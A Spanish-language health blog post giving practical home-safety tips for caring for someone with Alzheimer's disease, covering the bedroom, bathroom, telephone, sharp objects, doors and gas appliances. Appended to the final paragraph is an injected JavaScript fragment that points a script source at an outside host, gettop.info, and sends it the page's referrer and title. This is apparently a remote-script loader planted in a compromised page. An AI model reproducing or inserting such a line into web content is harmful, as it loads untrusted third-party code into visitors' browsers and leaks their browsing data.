Salud y belleza » Enfermedades

Radiografía de otro alemán malvado: Alzheimer II

1 Comentario

En oportunidades anteriores, desde este espacio se presentó un verdadero prolegómeno sobre el mal de Alzheimer [ver el articulo anterior sobre Alzheimer] . El mismo, a comparación con el articulo que se enseñará en esta ocasión, bien podría definirse como un prologo, una introducción o un prefacio (y una oda a Campanella, para que negarlo).

Durante el relato previo se hablo del Alzheimer, sus causas, sus consecuencias. En éste, en cambio, la cuestión se vuelve sumamente práctica con consejos y cuidados a tener en el trato con paciente que sufren de Alzheimer. Primero, aprender. Luego, responder.

Por su naturaleza, el Alzheimer es una enfermedad que obliga a todo el círculo que rodea al enfermo a cambiar de forma drástico sus más simples hábitos. Así, los cuidados sobre un sujeto que sufre aquel mal deben ser rigurosos.

En la habitación

Todo debe estar arreglado de forma que el enfermo/a pueda sentarse o pararse fácilmente de la cama y la silla. A su vez el placard debe presentar una disposición y orden simple para un uso fácil.

En el baño

Es necesario acomodar todo de modo en que el sujeto pueda acceder fácilmente al baño. Todos los detalles cuentan: los dispositivos de la luz, el bater, los cerrojos de la puerta, los artículos de limpieza. También se deben colocar agarraderas.
Recuerda, mientras más sencillo se vuelven las tareas domesticas, más alejado mantendrás a ese malvado Alemán.

Teléfono

Debe ser fácil se usar, con números grandes y con los teléfonos importantes programados para marcar con un solo presionar una tecla (también pon el listado de números de emergencia junto a todos los teléfonos del hogar).
En caso de disponer de inalámbrico, bueno sería utilizar el localizador para encontrarlo rápidamente.

Objetos de peligro

Tanto los cuchillos, como las tijeras, o los elementos de jardinería deben estar fuera del alcance de ellos. Menos objetivos peligrosos en la casa, menos chances de accidentes.

Ventanas y puertas

Todas deben funcionar de forma correcta (manijas cuidadas, cerrojos en buen estado, etc.) parece que ellos se puedan sentir libres, cómodos pero también seguros.
Los reflejos de las personas con Alzheimer son mínimos por lo tanto, todas las puertas deben abrirse fácilmente en caso de incendios o accidentes.

Otros peligros

¿Cómo cuales? El control de los aparatos eléctricos, de las instalaciones y también de las estufas u otras maquinas a gas. Las alarmas son otra buena opción.
Además, por otra parte, recuerda siempre darle una llave a algún vecino de confianza para que actúe en caso de emergencias.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.